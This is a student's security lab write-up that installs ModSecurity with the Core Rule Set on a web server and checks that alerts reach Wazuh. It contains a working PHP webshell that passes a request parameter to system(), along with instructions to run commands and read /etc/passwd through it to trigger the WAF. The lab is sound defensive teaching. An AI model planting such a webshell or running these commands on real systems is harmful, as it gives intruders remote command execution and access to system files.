Lab 5.1 Wazuh WAF - savannahc502/SavC-TechJournal-SEC350 GitHub Wiki

In this lab, I will alter web01 by adding a Web Application Firewall (WAF). The Wazuh agent should already be sending Apache error logs. I will then run malicious HTTP requests against web01 to see how the WAF performs.

Currently, web01's ability to talk to the WAN and the WAN's ability to talk to web01 is restricted. VyOS itself cannot filter by domain name, such as allowing traffic to updates.centos.org; it has to be by IP address or subnet. For this reason, many organizations use an internal mirror for this purpose. Instead, I will use a workaround.

WAN-to-DMZ

On FW01:

set firewall name WAN-to-DMZ rule 1 action accept
set firewall name WAN-to-DMZ rule 1 state established enable

These commands add a new permanent rule to VyOS so that return traffic for connections established from the DMZ to the WAN is allowed back in through the WAN-to-DMZ firewall.

DMZ-to-WAN

On FW01:

set firewall name DMZ-to-WAN rule 999 action accept
set firewall name DMZ-to-WAN rule 999 source address 172.16.50.3

For the workaround, I will add this temporary rule, which will be deleted, disabled or discarded once the software download is complete.

Adding mod_security, the Core Rule Set, and PHP to web01

This command was given to the class by the instructor, since many of the mod_security guides online are inaccurate. Once the installation succeeds, make sure to delete, disable or discard rule 999.

sudo yum install mod_security mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -y
sudo systemctl restart httpd

Deliverable 1

Show that security2_module is loaded:

image

Show that the Apache (httpd) error log is present:

image

Deliverable 2

Show that rw01 can reach web01

image

Testing ModSecurity

Download a php webshell to /var/www/html/shell.php on web01. I used this one.

cd /var/www/html
nano shell.php

Contents of shell.php

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>

Deliverable 3

Use the php webshell to execute a command like ifconfig, hostname or whoami. Provide a screenshot showing remote code execution.

image

Deliverable 4:

Screenshot of an attempt to run cat /etc/passwd

image

Deliverable 5:

Find the error or warning associated with Deliverable 4 in the Apache error_log.

image
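To show what to look for in Deliverable 5, here is an added example (not part of this lab page) that pulls ModSecurity 2.x entries out of Apache's error_log and groups them per request, so a blocked request and the CRS rules that scored it can be read off without scrolling the raw log. The log lines are constructed to resemble what the Core Rule Set writes when cat /etc/passwd is submitted through shell.php on web01; the client IP, pid, timestamps, unique_id and the exact rule ids are assumptions, not values from the lab.

```python
import re

# Constructed sample of Apache error_log lines in ModSecurity 2.x format.
# hostname "web01" and uri "/shell.php" come from the lab; everything else is made up.
SAMPLE_ERROR_LOG = """\
[Tue Mar 14 21:03:11.517832 2023] [:error] [pid 4821] [client 10.0.17.5:50122] [client 10.0.17.5] ModSecurity: Warning. Matched phrase "etc/passwd" at ARGS:cmd. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "92"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: etc/passwd found within ARGS:cmd: cat /etc/passwd"] [severity "CRITICAL"] [hostname "web01"] [uri "/shell.php"] [unique_id "ZBDkX0AAAQEAABLVGYQAAAAA"]
[Tue Mar 14 21:03:11.518201 2023] [:error] [pid 4821] [client 10.0.17.5:50122] [client 10.0.17.5] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "80"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [hostname "web01"] [uri "/shell.php"] [unique_id "ZBDkX0AAAQEAABLVGYQAAAAA"]
[Tue Mar 14 21:05:40.002113 2023] [core:notice] [pid 4701] AH00094: Command line: '/usr/sbin/httpd -D FOREGROUND'
"""

# Client address plus the ModSecurity verdict (a Warning just scores; "Access denied" blocked it).
MODSEC_RE = re.compile(
    r"\[client (?P<client>[\d.]+):\d+\] .*?ModSecurity: "
    r"(?P<action>Warning|Access denied with code (?P<code>\d+))"
)
# ModSecurity appends its details as [key "value"] pairs; this captures all of them.
KV_RE = re.compile(r'\[(?P<key>\w+) "(?P<value>[^"]*)"\]')


def parse_modsec_line(line):
    """Return a dict for a ModSecurity entry, or None for any other Apache log line."""
    m = MODSEC_RE.search(line)
    if not m:
        return None
    fields = dict(KV_RE.findall(line))
    return {
        "client": m.group("client"),
        "blocked": m.group("code") is not None,
        "status": int(m.group("code")) if m.group("code") else None,
        "rule_id": fields.get("id"),
        "msg": fields.get("msg"),
        "data": fields.get("data"),
        "hostname": fields.get("hostname"),
        "uri": fields.get("uri"),
        "unique_id": fields.get("unique_id"),
    }


def parse_error_log(text):
    """Parse every line of an error_log, keeping only ModSecurity events."""
    return [e for e in (parse_modsec_line(l) for l in text.splitlines()) if e]


def summarize_by_request(events):
    """Group events by unique_id (one per HTTP request) to list rules hit and the final verdict."""
    requests = {}
    for e in events:
        r = requests.setdefault(e["unique_id"],
                                {"client": e["client"], "uri": e["uri"], "rules": [], "blocked": False})
        r["rules"].append(e["rule_id"])
        r["blocked"] = r["blocked"] or e["blocked"]
    return requests
```

In a real log the same unique_id ties the scoring rule (930120 here) to the 949110 blocking decision, which is the pair to look for when matching Deliverable 4's 403 page to its log entry.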

Deliverable 6:

The same events, but in Wazuh

image
